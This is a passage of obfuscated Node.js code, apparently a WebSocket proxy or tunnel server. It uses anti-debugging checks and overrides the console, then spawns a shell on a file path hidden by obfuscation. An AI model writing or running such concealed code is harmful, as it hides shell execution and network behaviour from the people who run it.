RegExp(_0x7df763[_0x587a2e(-0x241,-0x17f,-0x13f,-0x25d,-0x1bc)],'i'),_0x3324e0=_0x7df763[_0x587a2e(-0x1e9,-0x2b1,-0x287,-0x216,-0x202)](_0x533f97,_0x7df763[_0x361ca8(0x369,0x3ee,0x419,0x37f,0x3f3)]);if(!_0x328154[_0x587a2e(-0x203,-0x37a,-0x355,-0x207,-0x2a8)](_0x7df763[_0x48f34d(0xef,0x25,0x92,0xb8,0x154)](_0x3324e0,_0x7df763[_0x48f34d(0x208,0x239,0x2ab,0x251,0x18f)]))||!_0x4da199[_0x587a2e(-0x351,-0x36a,-0x26d,-0x2d3,-0x2a8)](_0x7df763[_0x45f37e(0x93,-0x113,0x3b,-0x38,-0x57)](_0x3324e0,_0x7df763[_0x48f34d(0xcc,0xac,0x1ae,0x113,0x148)]))){if(_0x7df763[_0x48f34d(0x1a1,0x276,0x284,0xcd,0x10d)](_0x7df763[_0x361ca8(0x4ab,0x4e2,0x48f,0x4f5,0x438)],_0x7df763[_0x5e99cc(0x93,0x1da,0x13e,0x8a,0xd8)]))_0x7df763[_0x587a2e(-0x147,-0xb1,-0x146,-0xfe,-0x18e)](_0x3324e0,'0');else{const _0x17e8c2=_0xec6607?function(){function _0x3abe98(_0x38d8ac,_0x48d234,_0x6530ca,_0x50c571,_0x522c7e){return _0x48f34d(_0x48d234- -0x1f0,_0x38d8ac,_0x6530ca-0xf6,_0x50c571-0x46,_0x522c7e-0x8b);}if(_0x3ab78c){const _0x2fd43c=_0x325d5a[_0x3abe98(0xe,0x39,0x8d,-0x37,-0x7c)](_0x1600b4,arguments);return _0x43c9ca=null,_0x2fd43c;}}:function(){};return _0x4c5b43=![],_0x17e8c2;}}else{if(_0x7df763[_0x5e99cc(0x160,0x10f,0xc0,0xa4,0x11)](_0x7df763[_0x45f37e(0x12f,0x89,0x70,0x41,0x1c)],_0x7df763[_0x361ca8(0x325,0x424,0x49c,0x44f,0x3dd)]))_0x7df763[_0x5e99cc(-0x8e,-0x98,0x44,0xb8,-0x73)](_0x533f97);else{const _0x32d2e5=_0x66030e[_0x45f37e(0x72,0xdb,0x68,0x102,0xa6)](_0x39215f,arguments);return _0x1eed03=null,_0x32d2e5;}}}else{if(_0x7df763[_0x587a2e(-0x2e2,-0x15e,-0x30c,-0x289,-0x24a)](_0x3ffae3[_0x48f34d(0x10d,0x1e,0x1cf,0xde,0xc2)],'/')){const _0x23e4b8={};_0x23e4b8[_0x587a2e(-0x289,-0x359,-0x355,-0x313,-0x271)+_0x361ca8(0x2fc,0x30d,0x2aa,0x276,0x2a1)+'pe']=_0x7df763[_0x587a2e(-0x24a,-0x23f,-0x184,-0xcd,-0x1ae)],_0x4bd30a[_0x45f37e(-0xe6,-0xae,-0x60,-0x1,-0x72)+_0x48f34d(0x141,0x158,0x1a7,0xaa,0x223)](-0x5f0+0x2662+-0x1faa,_0x23e4b8),_0x2bf5a0[_0x587a2e(-0x1c7,-0x1a4,-0x2dd,-0x2b8,-0x27f)](_0x7df763[_0x48f34d(0x128,0xa8,0x1a8,0x68,0x7f)]);}else{const _0x3f82c6={};_0x3f82c6[_0x45f37e(-0x8,0x29,-0x5b,0x61,0x18)+_0x587a2e(-0x3fe,-0x357,-0x263,-0x38b,-0x318)+'pe']=_0x7df763[_0x45f37e(0x96,0xb5,0x18b,0x124,0xa0)],_0x2875d1[_0x587a2e(-0x3ae,-0x331,-0x28d,-0x30f,-0x2d3)+_0x361ca8(0x3a4,0x34d,0x2fb,0x3f0,0x301)](-0xe66+0x8*-0x490+0x347a,_0x3f82c6),_0x4b35ba[_0x587a2e(-0x2ea,-0x1cb,-0x2c5,-0x2cb,-0x27f)](_0x7df763[_0x587a2e(-0x1f3,-0x350,-0x335,-0x283,-0x293)]);}}})();}()),(function(){const _0x236a48={'kgsEZ':function(_0x5b3b71,_0x313828){return _0x5b3b71(_0x313828);},'IUuaa':function(_0x428c65,_0x45f87a){return _0x428c65===_0x45f87a;},'yvJLh':_0x36949b(-0x1fe,-0x82,-0xa0,-0x135,-0x160),'NDXLh':function(_0x2a0186,_0xd61fad){return _0x2a0186!==_0xd61fad;},'ioJGc':_0x36949b(0x115,-0x92,0x95,0xce,0x4f),'nkmzv':_0x586fa6(0x30c,0x397,0x39a,0x3e6,0x34f),'TbmkI':function(_0x325cf0,_0x5f0bb9){return _0x325cf0+_0x5f0bb9;},'QbQPM':_0x16f574(-0x364,-0x2e5,-0x1a4,-0x257,-0x274)+_0x15e43a(0x4c4,0x508,0x41a,0x409,0x51f)+_0x586fa6(0x420,0x3a2,0x305,0x2fc,0x3f9)+_0x15e43a(0x37b,0x2b0,0x3f2,0x452,0x350),'IWFzE':_0x16f574(-0xe9,-0xde,-0x1ee,-0x4c,-0x11d)+_0x586fa6(0x451,0x49b,0x505,0x55a,0x52a)+_0x586fa6(0x3ac,0x3e2,0x38e,0x4ba,0x37c)+_0x16f574(-0x9b,-0x36,-0x5c,-0x4b,-0x101)+_0x36949b(-0xd3,-0x115,-0x1dc,-0x5c,-0x10f)+_0x36949b(0x14,0x5c,-0x163,0x48,-0x83)+'\x20)','pAIwA':_0x15e43a(0x485,0x4d6,0x494,0x3ae,0x4b5),'ZySZv':_0x36949b(-0x184,-0x122,-0x199,-0x18a,-0x125),'MQLCG':function(_0x3e4ba1){return _0x3e4ba1();}};function _0x27fc8b(_0x1369c3,_0x295f82,_0x36390b,_0x311310,_0x2442f3){return _0x222c(_0x2442f3- -0x249,_0x1369c3);}function _0x36949b(_0x515b36,_0x57d71c,_0x5c171a,_0x4eb961,_0x2fe167){return _0x222c(_0x2fe167- -0x1ec,_0x57d71c);}const _0x33a3a5=function(){function _0x47700b(_0x325508,_0x58f2f2,_0x3d054b,_0x20b0bc,_0x3f77e5){return _0x36949b(_0x325508-0xda,_0x3d054b,_0x3d054b-0x4b,_0x20b0bc-0x65,_0x58f2f2-0x27d);}function _0x173b75(_0x416312,_0x4e515d,_0x3db7cd,_0x1eb382,_0x59535d){return _0x36949b(_0x416312-0x1e5,_0x416312,_0x3db7cd-0x11b,_0x1eb382-0x55,_0x3db7cd-0x36f);}function _0x371274(_0x49f758,_0x53b2a2,_0x1e5aee,_0x293403,_0x399b88){return _0x16f574(_0x49f758-0x13b,_0x1e5aee,_0x1e5aee-0x71,_0x293403-0x1d7,_0x399b88-0x69d);}function _0x535f55(_0x4cda53,_0xc46022,_0x58a3cc,_0x447ade,_0x3aefdb){return _0x15e43a(_0x58a3cc- -0x307,_0xc46022-0x5a,_0x58a3cc-0x39,_0x447ade-0x1d6,_0x4cda53);}function _0x280a0e(_0x19682a,_0x262f0a,_0x40703,_0x26c4fc,_0x331f10){return _0x16f574(_0x19682a-0x71,_0x262f0a,_0x40703-0xa9,_0x26c4fc-0x3e,_0x40703-0x118);}if(_0x236a48[_0x280a0e(0x136,0xf0,0x47,0x4c,-0x40)](_0x236a48[_0x173b75(0x346,0x4b6,0x3df,0x3eb,0x4d0)],_0x236a48[_0x371274(0x510,0x519,0x597,0x522,0x5f3)])){let _0x27d9a9;try{if(_0x236a48[_0x280a0e(0xf8,0x9a,0x53,0x4c,0x6b)](_0x236a48[_0x371274(0x575,0x441,0x54e,0x503,0x4d2)],_0x236a48[_0x371274(0x5cd,0x622,0x5fd,0x499,0x57d)]))_0x27d9a9=_0x236a48[_0x371274(0x588,0x518,0x47d,0x51f,0x4c2)](Function,_0x236a48[_0x371274(0x5f6,0x548,0x557,0x649,0x5c3)](_0x236a48[_0x173b75(0x391,0x430,0x3af,0x481,0x3fb)](_0x236a48[_0x280a0e(-0x94,-0xd6,-0x65,-0x45,-0xac)],_0x236a48[_0x47700b(0x1fb,0x230,0x23d,0x158,0x308)]),');'))();else return![];}catch(_0x1b5076){_0x236a48[_0x47700b(0x1fe,0x2d2,0x2f5,0x31b,0x32d)](_0x236a48[_0x535f55(0x8f,0x121,0x9c,0x2,0xb0)],_0x236a48[_0x535f55(0x11f,0x9e,0x2f,-0x60,0xaf)])?_0x27d9a9=window:_0x236a48[_0x47700b(0x295,0x1bc,0x29f,0x1bd,0x23c)](_0x19cc34,'0');}return _0x27d9a9;}else return!![];},_0x547036=_0x236a48[_0x16f574(-0x111,-0x6a,-0x109,-0x1e3,-0xfc)](_0x33a3a5);function _0x586fa6(_0x2ea91b,_0x252122,_0x7b4811,_0x112808,_0x27f54f){return _0x222c(_0x252122-0x2cf,_0x7b4811);}function _0x16f574(_0x2f756e,_0x54a8b7,_0x347f3f,_0x1c5095,_0xbe46c1){return _0x222c(_0xbe46c1- -0x306,_0x54a8b7);}function _0x15e43a(_0x13eed1,_0x5e161f,_0x4a1bd6,_0x29c317,_0x39108b){return _0x222c(_0x13eed1-0x2a1,_0x39108b);}_0x547036[_0x16f574(-0x20a,-0x2a7,-0x16c,-0x233,-0x24f)+_0x15e43a(0x34f,0x3d1,0x3bc,0x279,0x29a)+'l'](_0x533f97,-0x1f99+-0x129c+-0x1*-0x41d5);}());const _0x3e3e80=(function(){const _0x4d4e3e={};_0x4d4e3e[_0x14b72c(0x300,0x2f8,0x3b4,0x25b,0x3e3)]=_0x14b72c(0x36c,0x44b,0x4d2,0x37e,0x50d)+_0x14b72c(0x3f5,0x3cd,0x48c,0x3a0,0x410)+'+$',_0x4d4e3e[_0x14b72c(0x410,0x3de,0x37a,0x46b,0x3dc)]=function(_0x155e86,_0x1911e2){return _0x155e86===_0x1911e2;},_0x4d4e3e[_0x3b3e39(0xc,-0x66,-0x18,-0xd2,-0x3e)]=_0x14b72c(0x392,0x2ed,0x2b1,0x37b,0x34f),_0x4d4e3e[_0x37c537(-0x158,-0xb5,-0x73,0x4b,-0xd)]=_0x293844(-0x15d,-0x17e,-0x17b,-0x1b0,-0x1dc);function _0x3b3e39(_0x45df62,_0x4863f7,_0x27606b,_0x5888d2,_0x572bd9){return _0x222c(_0x45df62- -0x82,_0x4863f7);}_0x4d4e3e[_0x14a581(-0x88,0x27,0xfc,-0xa5,-0x26)]=_0x14b72c(0x4b2,0x409,0x4b1,0x4a8,0x3c4),_0x4d4e3e[_0x37c537(-0x16c,-0xd6,-0x168,-0x100,-0x1c9)]=_0x293844(-0xb2,0x3f,-0xd3,-0xdb,-0xa8);function _0x14b72c(_0x2002d0,_0x478079,_0x1130f9,_0x18b27a,_0x1b644d){return _0x222c(_0x478079-0x209,_0x18b27a);}function _0x37c537(_0x2efe6f,_0x238f13,_0x31cf20,_0x2a8bb6,_0x5266e4){return _0x222c(_0x31cf20- -0x23e,_0x2a8bb6);}function _0x293844(_0xa0d007,_0x1b46b1,_0xb3ba0b,_0x53d00c,_0x1d7c71){return _0x222c(_0xa0d007- -0x23c,_0x1d7c71);}function _0x14a581(_0x1d5669,_0xf09637,_0x2a8cb9,_0x5b7be5,_0x41a08a){return _0x222c(_0xf09637- -0x204,_0x41a08a);}_0x4d4e3e[_0x14b72c(0x410,0x450,0x525,0x481,0x3b3)]=_0x3b3e39(0x57,-0x4e,-0x83,0x86,0x120);const _0x3c0621=_0x4d4e3e;let _0x2c8e2b=!![];return function(_0xa5aa2b,_0x48c4e1){function _0x4d943e(_0xeeed4c,_0x414686,_0x522e28,_0x496173,_0x8f2078){return _0x37c537(_0xeeed4c-0x40,_0x414686-0x107,_0xeeed4c-0x46a,_0x8f2078,_0x8f2078-0xc);}function _0x1df0fa(_0x24afd9,_0x349266,_0x2bfb33,_0x36c3f2,_0x111190){return _0x3b3e39(_0x2bfb33- -0x73,_0x111190,_0x2bfb33-0x11d,_0x36c3f2-0x1d8,_0x111190-0x16d);}function _0x40f4c4(_0x3d6782,_0xfab5c1,_0x373344,_0x2e514d,_0x32a3a5){return _0x14a581(_0x3d6782-0x72,_0x373344-0x9a,_0x373344-0x1e0,_0x2e514d-0x1c1,_0x3d6782);}function _0x1c5e2a(_0x1c04c5,_0x1743bb,_0x549910,_0x808853,_0xd378ef){return _0x3b3e39(_0x549910- -0x14,_0x1743bb,_0x549910-0x137,_0x808853-0xed,_0xd378ef-0x15);}function _0x80c73c(_0x4a154d,_0x52c2dc,_0x1256d1,_0x166334,_0x181a9b){return _0x3b3e39(_0x52c2dc- -0x2e6,_0x181a9b,_0x1256d1-0x1,_0x166334-0x1bb,_0x181a9b-0x51);}if(_0x3c0621[_0x1c5e2a(0x1bd,0x1b3,0x13f,0xd5,0x1ed)](_0x3c0621[_0x1c5e2a(0x3d,0x37,0x40,0xf6,0x13)],_0x3c0621[_0x4d943e(0x473,0x41e,0x4a8,0x473,0x3b9)]))_0x538557[_0x80c73c(-0x1e8,-0x2c4,-0x2e2,-0x280,-0x21b)](_0x40f4c4(0x44,0x8,0x42,0xbd,0x67)+_0x40f4c4(0x14,0x14b,0x76,0x98,0x94)+_0x5ba607);else{const _0x239d7b=_0x2c8e2b?function(){function _0x32ffd3(_0x14ab40,_0x3681ae,_0x1b991b,_0x28db5f,_0x156022){return _0x80c73c(_0x14ab40-0x19,_0x3681ae-0x20b,_0x1b991b-0x8c,_0x28db5f-0x1a2,_0x28db5f);}function _0x3e441e(_0x3000b1,_0x227314,_0x37efd2,_0x1f3652,_0x339a0){return _0x80c73c(_0x3000b1-0x10c,_0x37efd2-0x742,_0x37efd2-0x152,_0x1f3652-0x8d,_0x227314);}const _0x497551={};function _0x483624(_0x35db9a,_0x1ce6f7,_0x35eed5,_0x33ccbe,_0x55ab34){return _0x4d943e(_0x35eed5- -0x52d,_0x1ce6f7-0x1c1,_0x35eed5-0x20,_0x33ccbe-0xcf,_0x33ccbe);}_0x497551[_0x139bc3(0x426,0x3fa,0x334,0x331,0x357)]=_0x3c0621[_0x139bc3(0x25f,0x1e7,0x2de,0x2b6,0x219)];const _0xf80675=_0x497551;function _0x139bc3(_0x3b08e5,_0x4cd9fc,_0x352275,_0x2bf1b8,_0x20700d){return _0x40f4c4(_0x2bf1b8,_0x4cd9fc-0x113,_0x20700d-0x294,_0x2bf1b8-0x1a4,_0x20700d-0x66);}function _0x52ce64(_0x31b8c5,_0x35d946,_0x50fb58,_0x4b9b47,_0x59eb41){return _0x40f4c4(_0x59eb41,_0x35d946-0x91,_0x35d946-0x85,_0x4b9b47-0xf3,_0x59eb41-0x11);}if(_0x3c0621[_0x32ffd3(0x87,0x78,0x5d,0x36,0xe2)](_0x3c0621[_0x483624(-0x210,-0x2f9,-0x273,-0x1a1,-0x30d)],_0x3c0621[_0x483624(-0x66,-0x20a,-0x136,-0x18f,-0xd6)]))return _0x1a6f0a[_0x483624(-0x2c,-0x40,-0xc3,-0x8d,0xd)+_0x483624(-0x2c3,-0x33a,-0x262,-0x194,-0x260)]()[_0x32ffd3(-0xc6,-0xba,-0x84,-0x8f,-0xb8)+'h'](_0xf80675[_0x139bc3(0x3d5,0x34a,0x3bf,0x36e,0x357)])[_0x483624(-0x25,-0xab,-0xc3,-0x16f,-0x160)+_0x3e441e(0x4ac,0x46d,0x479,0x4be,0x564)]()[_0x483624(-0x11d,-0x1bb,-0x15c,-0x11b,-0x146)+_0x3e441e(0x55f,0x3ec,0x49f,0x4f6,0x3af)+'r'](_0x1db1c8)[_0x3e441e(0x4f0,0x537,0x47d,0x403,0x4a9)+'h'](_0xf80675[_0x52ce64(0x66,0x148,0x22a,0x111,0x153)]);else{if(_0x48c4e1){if(_0x3c0621[_0x52ce64(0xd6,0xf0,0x77,0x1a1,0x1a0)](_0x3c0621[_0x139bc3(0x405,0x315,0x428,0x402,0x355)],_0x3c0621[_0x52ce64(0x177,0x146,0x1b6,0x221,0x1b7)])){const _0x162620=_0x48c4e1[_0x139bc3(0x250,0x323,0x336,0x3f8,0x321)](_0xa5aa2b,arguments);return _0x48c4e1=null,_0x162620;}else{const _0x17412e=_0x5eac96?function(){function _0x5db974(_0x2f3515,_0x589995,_0x1375cc,_0x3845b5,_0x364a76){return _0x483624(_0x2f3515-0x22,_0x589995-0x1c0,_0x364a76-0x167,_0x2f3515,_0x364a76-0xdd);}if(_0x36c389){const _0x11534f=_0x1f1891[_0x5db974(-0xe,-0xf,0x11,0x7e,0x5d)](_0x25d17c,arguments);return _0x5d0883=null,_0x11534f;}}:function(){};return _0x14dabb=![],_0x17412e;}}}}:function(){};return _0x2c8e2b=![],_0x239d7b;}};}()),_0x48a700=_0x3e3e80(this,function(){function _0x56a2ea(_0x25b7e4,_0x20d4f7,_0xc142c1,_0x41b6a9,_0x31b32e){return _0x222c(_0x25b7e4- -0x24f,_0x20d4f7);}const _0x35f877={'tyKaX':function(_0x211607){return _0x211607();},'qdEbE':_0x5e1a7a(-0x2b4,-0x278,-0x27e,-0x188,-0x22f)+_0xd2d693(0x2a5,0x2e8,0x37d,0x322,0x310)+_0xd2d693(0x2b0,0x344,0x2db,0x348,0x289)+')','Rpahm':_0xd2d693(0x1ec,0x296,0x130,0x250,0x15b)+_0xd2d693(0x211,0x174,0x1c7,0x263,0x24b)+_0xd2d693(0x122,0x7d,0x1e7,0x10f,0xc9)+_0x5e1a7a(-0x21b,-0x253,-0x267,-0x275,-0x2e0)+_0x5a86c6(-0xc6,-0x80,-0xef,-0x2,-0x7)+_0xd2d693(0x1b4,0x1b1,0x1cc,0x268,0x24c)+_0x1f542c(0x1dc,0x1db,0xac,0x93,0x136),'RUvbo':function(_0x2c953e,_0x4f6b20){return _0x2c953e(_0x4f6b20);},'nnldf':_0x1f542c(0x19f,0x140,0x160,0xb3,0xc1),'gZTRd':function(_0x2a21dd,_0x4016db){return _0x2a21dd+_0x4016db;},'BBKlA':_0x1f542c(0xac,-0x25,0x4f,0x10f,0xa1),'gNvzd':_0x5e1a7a(-0x2e0,-0x253,-0x3a4,-0x39e,-0x2b7),'BfvaY':function(_0x36200e){return _0x36200e();},'GwhBd':function(_0x38f280,_0x14836d){return _0x38f280!==_0x14836d;},'PZViy':_0x5e1a7a(-0x2a1,-0x2fa,-0x1e9,-0x2e1,-0x2c3),'YZnVv':_0x56a2ea(-0x1bd,-0x23e,-0x243,-0x23d,-0x240)+_0x5a86c6(0x157,-0x1f,0x8f,0x1a1,0xb4)+_0xd2d693(0x172,0x1eb,0x23a,0x215,0x142)+_0x5a86c6(-0x137,-0xa9,-0xf0,-0x17f,-0x95),'vycxt':_0x56a2ea(-0x66,-0x12c,0x63,-0xf3,-0x11d)+_0x5a86c6(0xa0,0x47,-0x2d,0x8f,0x5d)+_0xd2d693(0x1b2,0x192,0xd1,0x21a,0x101)+_0x1f542c(0x241,0x20c,0x2cb,0x250,0x20a)+_0x56a2ea(-0x172,-0xe6,-0xa6,-0xfb,-0x1d8)+_0x56a2ea(-0xe6,-0x8,-0x108,-0xa5,-0x1ab)+'\x20)','YuZTU':function(_0x363c43){return _0x363c43();},'EgIjE':function(_0x2fe81a,_0x45475f){return _0x2fe81a===_0x45475f;},'zOvbg':_0x5e1a7a(-0x3d4,-0x25e,-0x3da,-0x388,-0x338),'dBMnj':_0xd2d693(0x1c2,0x27b,0x12b,0x191,0x152),'rdZbx':_0x1f542c(0x19c,0x24,-0x2d,-0x5,0xbd),'FFddC':_0x5a86c6(0x7a,0x40,-0xdf,0x78,-0x38),'MDzGd':_0x1f542c(0x70,0x46,0xa,0x80,0xdd),'hutFS':_0x5e1a7a(-0x25b,-0x418,-0x2e3,-0x3b4,-0x32f),'xuxDF':_0x56a2ea(-0x1b6,-0x237,-0x1ec,-0x144,-0x1d8)+_0x5e1a7a(-0x23a,-0x1f8,-0x266,-0x155,-0x226),'fvPjT':_0x1f542c(0xee,0x76,0x156,-0x7,0xc4),'ArJzO':_0xd2d693(0x225,0x18d,0x1ff,0x21f,0x2ef),'chqdL':function(_0x485508,_0x7d96f9){return _0x485508<_0x7d96f9;},'DlSBX':function(_0x26fcc3,_0x40861){return _0x26fcc3!==_0x40861;},'SeIEh':_0x1f542c(0x1c,0x10,0x184,0x83,0xa2)};let _0x4f7a60;try{if(_0x35f877[_0x56a2ea(-0x9d,-0xf0,-0x2a,0x8,-0x120)](_0x35f877[_0x5a86c6(0xb1,0x3a,0x0,0x42,0x3a)],_0x35f877[_0x56a2ea(-0xa6,-0x186,-0x178,-0x51,-0x2a)]))_0x599484=_0x2d52fb;else{const _0x4b6401=_0x35f877[_0x1f542c(-0x2c,0x44,0xce,0x7,0x9c)](Function,_0x35f877[_0x56a2ea(-0xf0,-0xc2,-0x165,-0x168,-0x3f)](_0x35f877[_0xd2d693(0x1fe,0x29f,0x27d,0x10e,0x218)](_0x35f877[_0x5e1a7a(-0x340,-0x344,-0x328,-0x1c8,-0x270)],_0x35f877[_0x5a86c6(0x33,0x30,-0xe,-0x49,-0x43)]),');'));_0x4f7a60=_0x35f877[_0x1f542c(0x132,0xd0,0x1d7,0x4b,0x10e)](_0x4b6401);}}catch(_0x57388d){_0x35f877[_0x5a86c6(0xae,-0x5c,-0x74,-0x66,0x4d)](_0x35f877[_0x1f542c(0x41,0x15c,0x77,0x1d7,0x12e)],_0x35f877[_0xd2d693(0x13f,0xf0,0x1f9,0x7c,0x16b)])?_0x35f877[_0x5a86c6(-0x61,-0xf2,0x6d,-0x67,-0x75)](_0x39bf25):_0x4f7a60=window;}const _0x3f27fd=_0x4f7a60[_0xd2d693(0x180,0x1d9,0x100,0x1d7,0x23e)+'le']=_0x4f7a60[_0x1f542c(0x126,0x1c0,0x29,0x51,0xe6)+'le']||{};function _0x1f542c(_0x477355,_0xedc545,_0x18d292,_0x5cf9c7,_0x1fa2e0){return _0x222c(_0x1fa2e0-0x5,_0x5cf9c7);}function _0xd2d693(_0x112189,_0x371479,_0x3cfe87,_0x469dc7,_0x3ae34a){return _0x222c(_0x112189-0x9f,_0x3ae34a);}function _0x5e1a7a(_0x81e0ee,_0x1c8f5f,_0x5057d9,_0x44c650,_0x75c638){return _0x222c(_0x75c638- -0x3d3,_0x1c8f5f);}const _0x3e33f8=[_0x35f877[_0xd2d693(0x165,0x15a,0x1aa,0x225,0xb8)],_0x35f877[_0x56a2ea(-0x4b,0x6,-0x138,-0x9,-0x1d)],_0x35f877[_0xd2d693(0x169,0xfc,0x1a4,0xc8,0x13d)],_0x35f877[_0x1f542c(0x309,0x2fa,0x1e6,0x23b,0x226)],_0x35f877[_0x5e1a7a(-0x273,-0x382,-0x247,-0x30a,-0x2d0)],_0x35f877[_0x5a86c6(-0x159,-0x133,-0x7a,-0xfd,-0xdc)],_0x35f877[_0x5a86c6(0x76,-0x43,-0x28,-0x22,-0x45)]];function _0x5a86c6(_0xc87c0a,_0x553564,_0x27b30a,_0x1ac741,_0x20ac17){return _0x222c(_0x20ac17- -0x16f,_0x27b30a);}for(let _0x4cb676=-0x1cec+0x1*0x1b92+0x15a;_0x35f877[_0x1f542c(0xbc,0x146,0x1c1,0x1f2,0x163)](_0x4cb676,_0x3e33f8[_0xd2d693(0x18a,0x17b,0x1e0,0x1a2,0x129)+'h']);_0x4cb676++){if(_0x35f877[_0x56a2ea(-0x10,0x4f,0x81,-0xf0,0x8)](_0x35f877[_0xd2d693(0x206,0x1d2,0x127,0x2bf,0x12f)],_0x35f877[_0x1f542c(0x189,0x1e6,0x121,0x168,0x16c)])){const _0x26189e=new _0x5ed20f(_0x35f877[_0x56a2ea(-0x1e,-0x23,-0x13,-0x5e,0xb9)]),_0x3a302c=new _0x108b02(_0x35f877[_0xd2d693(0x222,0x238,0x1b9,0x276,0x311)],'i'),_0x2709e6=_0x35f877[_0x5e1a7a(-0x2bf,-0x2c0,-0x3be,-0x392,-0x33c)](_0x4664cb,_0x35f877[_0xd2d693(0x2bf,0x332,0x231,0x287,0x20e)]);!_0x26189e[_0x1f542c(0x1a3,0x10e,0x16a,0x102,0x124)](_0x35f877[_0x1f542c(0x1be,0x15c,0x1dc,0x1e1,0x164)](_0x2709e6,_0x35f877[_0x56a2ea(-0xcb,-0xc1,-0x138,-0x123,-0xf4)]))||!_0x3a302c[_0xd2d693(0x1be,0x221,0x273,0x19a,0x239)](_0x35f877[_0x1f542c(0x175,0x213,0xe1,0x79,0x164)](_0x2709e6,_0x35f877[_0x5a86c6(-0x35,-0xe2,-0x18b,-0x18c,-0xc3)]))?_0x35f877[_0x1f542c(0x76,0x7f,0x144,0x136,0x9c)](_0x2709e6,'0'):_0x35f877[_0x56a2ea(-0x88,0x3b,-0x140,0x2a,-0x117)](_0x4be393);}else{const _0x326dd0=_0x3e3e80[_0x1f542c(0x201,0x243,0xcb,0x19a,0x1aa)+_0xd2d693(0x164,0x1b9,0x201,0xb8,0x1bc)+'r'][_0x56a2ea(-0x29,-0xc,-0xe6,0x20,-0xa7)+_0x1f542c(0x102,0x115,0x16b,0x143,0x175)][_0x5e1a7a(-0x28b,-0x290,-0x1e9,-0x25a,-0x288)](_0x3e3e80),_0x30f3d4=_0x3e33f8[_0x4cb676],_0x5cc1dc=_0x3f27fd[_0x30f3d4]||_0x326dd0;_0x326dd0[_0x56a2ea(-0x109,-0xe4,-0x83,-0x142,-0xb4)+_0xd2d693(0x14c,0x174,0xe0,0x1d2,0x1b8)]=_0x3e3e80[_0x1f542c(0x167,0xa3,0x83,0x84,0x150)](_0x3e3e80),_0x326dd0[_0x5e1a7a(-0x11a,-0x1ae,-0x122,-0xd8,-0x195)+_0xd2d693(0x13e,0x165,0x172,0x1f5,0xe2)]=_0x5cc1dc[_0xd2d693(0x2dd,0x27a,0x2f7,0x260,0x391)+_0x1f542c(0xf7,0x49,-0x1f,0x148,0xa4)][_0x5e1a7a(-0x243,-0x2a6,-0x2b2,-0x225,-0x288)](_0x5cc1dc),_0x3f27fd[_0x30f3d4]=_0x326dd0;}}});_0x48a700();const net=require(_0x5b3717(-0xf8,-0x10d,-0x15d,-0x1ae,-0x179)),http=require(_0x5b3717(-0x19a,-0x244,-0x215,-0x13d,-0x182)),{WebSocket,createWebSocketStream}=require('ws'),{TextDecoder}=require(_0x5b3717(-0x2ca,-0x1df,-0x2ca,-0x384,-0x342)),logcb=(..._0xae0cb9)=>console[_0x5b3717(-0x291,-0x205,-0x2e8,-0x261,-0x2d9)][_0x1d31e6(0x126,0x1d7,0x1c1,0xf3,0x51)](this,..._0xae0cb9),errcb=(..._0x25b289)=>console[_0x5b3717(-0x2a5,-0x2ad,-0x22a,-0x2b7,-0x33b)][_0x1e3602(0x4a,0xde,-0xf9,-0xb,-0xbe)](this,..._0x25b289);function _0x1e3602(_0x153873,_0x28ca00,_0x36e8f2,_0x5320bc,_0x498200){return _0x222c(_0x5320bc- -0x156,_0x28ca00);}const {spawn}=require(_0x1e3602(-0x166,-0x68,-0x8d,-0x78,-0x9e)+_0x1d31e6(0x12a,0xa3,0x6a,0xed,0x1b2)+_0x1e3602(-0x9d,-0xa1,0xc,0x22,0x61)),uuid=(process[_0x1d31e6(0x1cc,0x247,0x1e1,0x155,0x1dd)][_0x5b3717(-0x23c,-0x153,-0x2a5,-0x247,-0x2bf)]||_0x504eae(0x2b4,0x24d,0x2dd,0x337,0x233)+_0x5b3717(-0x1c7,-0x154,-0x245,-0x26c,-0x1c5)+_0x3b9f4f(0xbd,0xac,-0xe,0x9e,0x2f)+_0x504eae(0x3b4,0x2ec,0x31d,0x325,0x473)+_0x1e3602(-0x56,0xbf,0xc4,0x8d,-0x13)+_0x3b9f4f(0x3d,-0x14,0xef,0x45,-0x60)+_0x3b9f4f(0xe1,0xc2,0x1ad,0x1b6,0x177)+'e')[_0x1e3602(0x13,0x12b,0x185,0xf4,0xe8)+'ce'](/-/g,''),port=process[_0x504eae(0x377,0x295,0x2fd,0x41e,0x305)][_0x1d31e6(0x1a9,0x13f,0x199,0x254,0x1c8)]||0x1c25+-0x75b*-0x5+-0x2238,shellFilePath=_0x504eae(0x392,0x36e,0x2e6,0x47c,0x45d)+_0x504eae(0x251,0x310,0x1f0,0x285,0x255),childProcess=spawn('sh',[shellFilePath]),httpServer=http[_0x1e3602(0x5f,0x176,0x1a4,0xb8,0x18f)+_0x5b3717(-0x1a8,-0x18b,-0x1a4,-0x207,-0x21d)+'er']((_0x1227b5,_0x1cbdc7)=>{const _0x1c21f8={'baaVO':_0x7dbfd5(0x434,0x45f,0x2fd,0x401,0x3aa)+_0x7dbfd5(0x3e4,0x33f,0x28d,0x38a,0x360),'cxNks':_0x29d5f9(0x203,0x2e2,0x223,0x236,0x245)+_0x270b17(0x3e7,0x2f6,0x2a7,0x28f,0x32f)+_0x270b17(0x2b3,0x21f,0x14b,0x1a7,0x1b5),'UbKUh':_0x270b17(0x1ce,0x19c,0xcb,0x106,0x136),'VUWbC':function(_0x17d3f3,_0x574243){return _0x17d3f3(_0x574243);},'KBBMA':_0x29d5f9(0x2a5,0x225,0x35c,0x35b,0x1ef),'QRTPc':_0x213bca(0x537,0x4bd,0x4b4,0x579,0x40e),'MbvHf':function(_0x35b46f,_0x58cecc){return _0x35b46f+_0x58cecc;},'CKgNX':function(_0x34a6c2,_0x164544){return _0x34a6c2==_0x164544;},'SSpbY':function(_0x4fa7eb,_0xe732e3){return _0x4fa7eb==_0xe732e3;},'UpZOL':function(_0x8b5df9,_0x548445){return _0x8b5df9+_0x548445;},'FphDo':function(_0xd8db64,_0x53229f){return _0xd8db64==_0x53229f;},'XdJIb':function(_0x1cafcd,_0x2fbc56,_0x5372b3,_0x1fb38a){return _0x1cafcd(_0x2fbc56,_0x5372b3,_0x1fb38a);},'prTxT':_0x7dbfd5(0x2b0,0x305,0x329,0x343,0x38e)+_0x5ec539(-0x125,-0x166,-0x53,-0x10b,-0x98),'bcCTr':function(_0x3b576c,_0x3c6b80,_0x4be179){return 